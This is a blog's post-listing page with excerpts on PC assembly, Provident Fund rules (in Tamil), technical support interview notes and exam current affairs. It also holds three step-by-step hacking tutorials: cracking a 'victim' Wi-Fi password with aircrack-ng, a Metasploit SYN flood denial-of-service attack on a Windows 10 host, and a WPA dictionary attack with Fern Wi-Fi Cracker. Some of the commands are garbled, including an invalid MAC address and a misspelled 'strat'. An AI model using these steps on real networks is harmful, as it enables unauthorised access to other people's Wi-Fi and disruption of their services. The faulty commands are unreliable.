Skip to main content

Posts

how to assemble desktop pc step by step

Assembling Desktop Computer Needed tools 1. + type screw driver or philips screw driver 2. Multimeter - to check proper voltage Neutral phase - 230 volt Neutral ground - 3 to 5 volt 3. ESD band - To ground our electro static current from our body 4. Screws    *Hard Screw-Harddisk,SMPS,Add on card    *Soft screws-Removable storage,Motherboard    *Sitting Screw-To give gap between motherboard and cabinet Follow Step by Step Step 1: With the help of multimeter check proper voltage Neutral phase - 230 volt Neutral ground - 3 to 5 volt Step 2 : Fix Smps to the cabinet Step 3 : Wear ESD band keep motherboard outside cabinet then fix CPU,RAM and CMOS BATTERY Step 4 : Give front pannel connection to the motherboard Step 5 : Fix SMPS power connector to the motherboard Turn on the system to check for a single beep sound Step 6 : fix HDD,FDD in 3 1/2 Bay Step 7 : fix CD,DVD in 5 1/2 bay Step 8 : Give Data cable connection to the motherboard Step 9 : Connect V...

How to Calculate Employees' Provident Fund Balance and Interest

 பணியாளர் மற்றும் முதலாளியின் பங்களிப்பு மொத்தம் பணியாளர் வருங்கால வைப்பு நிதி அமைப்பில் உருவாக்கப்பட்ட நிதியில் டெபாசிட் செய்யப்படுகிறது. பணியாளர் வருங்கால வைப்பு நிதி (ஈபிஎஃப்) என்பது ஓய்வூதிய சேமிப்பு விருப்பமாகும், இது நீண்ட காலத்திற்கு குறிப்பாக குறிக்கப்படுகிறது.  20 அல்லது அதற்கு மேற்பட்ட ஊழியர்களைக் கொண்ட எந்தவொரு நிறுவனமும் EPF கழிக்க விருப்பத்துடன் செயல்படுத்தப்படுகிறது. EPF-ஐப் பொறுத்தவரை, ஒரு ஊழியர் அடிப்படை சம்பளத்தில் 12 சதவீதத்தையும், முதலாளி 8.33 சதவீத ஊழியர்களின் ஓய்வூதிய திட்டத்திற்கும், 3.67 சதவீத ஊழியர்களின் EPF.  பணியாளர் மற்றும் முதலாளியின் பங்களிப்பு மொத்தம் பணியாளர் வருங்கால வைப்பு நிதி அமைப்பில் உருவாக்கப்பட்ட நிதியில் டெபாசிட் செய்யப்படுகிறது.  மாதாந்திர இயக்க நிலுவை அடிப்படையில் ஒரு வட்டி தொகை வழங்கப்பட்டு நிதியாண்டின் இறுதியில் நிதியில் சேர்க்கப்படும். ரூ. 15,000 க்கும் குறைவான சம்பளத்தை பெறும் ஊழியர்களுக்கு EPF விலக்கு கட்டாயமாகும், ஆனால் மற்றவர்கள் ஈபிஎஃப்ஒவின் படிவம் 11 இல் செய்யப்பட்ட அறிவிப்பின் மூலம் இந்த திட்டத்திலிருந்து விலகலாம். ...

basic technical support interview questions and answers

                             Computer Generation BASIC – Beginners all purpose symbolic instruction code 1st Generation    -  Machine language 2nd Generation   -  Assembly language 3rd Generation    - Basic Cobol flattron 4th Generation    - High level language 5th Generation    - Artificial Intelligence Operating system mode Two modes 1.CUI    -   Character user interface  (without color Dos) 2. GUI  -  Graphical  user interface (with color ) Ex-Win Xp, Win  95,win98,         win 2000….  upto windows 10      Disk Operating System (Dos) ⇒ IBM introduce Dos but microsoft taken ownership and changed the name as MS-Dos ⇒ We use Dos now for troubleshooting GUI OS ⇒ To do Dos we need a boot CD CPU units –Two types ⇒ Arithmetic logic unit – which performs arithm...

Current affairs of October 2020 - for preparation of IBPS,RRB, SBI, Railways and other exams

                                                         1st October 2020 Current Affairs  Q 1 . Who has been appointed as the new President of Film and Television Institute of India (FTII) - SHEKHAR KAPUR Q 2 . Who has launched the Defence India Startup Challenge (DISC 4) during the IDEX event - RAJNATH SINGH Q 3 . Which Bank becomes 1st bank to enable document embedding feature on SFMS (Structured Financial Messaging System) – IDBI  BANK Q 4 . Which state government is started the "YSR Jala Kala scheme" - ANDHRA PRADESH   Q 5 . Who has launched a cyber insurance cover 'Digital Suraksha Group Insurance' for online financial frauds- Bajaj Allianz Gl and Flipkart  Q 6 . Who has been appointed as a brand ambassador of Myntra for "Beauty" segment - DISHA PATANI   Q 7 . Who has been awarded the Spec...

how to hack wifi using aircrack-ng in kali linux

Aircrack-ng is one of the tools that kali has to crack wireless Step 1 : ifconfig wlan0 down Step 2 : iwconfig wlan0 mode managed Step 3 : ifconfig wlan0 up Step 4 : airmon-ng check wlan0 Step 5 : kill process or with trouble Step 6 : airmon-ng wlan0 Step 7 : airodump-ng wlan0 Step 8 : airodump-ng -c 6 -w SCAN_test --bssid(victim bssid) wlan0 Step 9 : aireplay-ng -1 0 -e (victim id name) -a CC:D1:S3:FE:GT:HH -h 00:cd:ca:45:df:gf wlan0 Step 10 : aireplay-ng -3 -b BSSID wlan0 Step 11 : aircrack-ng filename.cap Now password will be cracking After cracked we can see the password of victim wifi.. My Youtube channel video link :  https://youtu.be/XjvtJTA5FHo =========Thanks to visit my page=============

SYN Flooding a Target Host using Metasploit || Dos attack

 A SYN flood is a form of Dos attack in which an attacker sends a succession of SYN request to a target machine in an attempt to exhaust its resources and make it unresponsive to legitimate incoming traffic. Before Beginning task ensure that the firewall is turned off Step 1 : Open kali linux Step 2 : In this lab we are going to perform SYN flooding on the win 10 machine through port 21 Step 3 : Tyoe the command nmap -p 21 (ip address of win 10) and press enter Step 4 : The result returned by Nmap states that the port is open Step 5 : Type msfconsole from command line terminal and press enter to launch msfconsole Step 6 : Type the command use auxiliary/dos/tcp/synflood and press enter Step 7 : Now Type show option and press enter.These displays all the options with auxiliary module Step 8 : issue the following command set Rhost (ip address of windows 10) set Rport 21   Step 9 : To begin, type exploit and press enter Step 10 : Switch to the windows 10 machine, launch wireshark ...

How to hack Wifi using fern wifi cracker

 Fern wifi cracker is one of the tool to crack wifi  First we should turn the wireless card into monitoring mode. To do this, Type below command "airmon-ng strat wlan0" in the terminal. Now open fern wifi cracker Step 1 : Application →click wireless attacks →Fern wifi cracker Step 2 : select wlan0  Step 3 : click "scan for access point" Step 4 : after finishing scan, it will show wireless network found. Step 5 : Click wifi wpa network as shown in the above screenshot.it will show wireless found.Generally in wpa n/w it performs Dictionary attack. Step 6 : click Browse and find the rockyou.txt to use for attack Step 7 : click Wifi attack Step 8 : After finishing the dictionary attack it found the password . --------------------------Thank you to visit my page--------------------------------------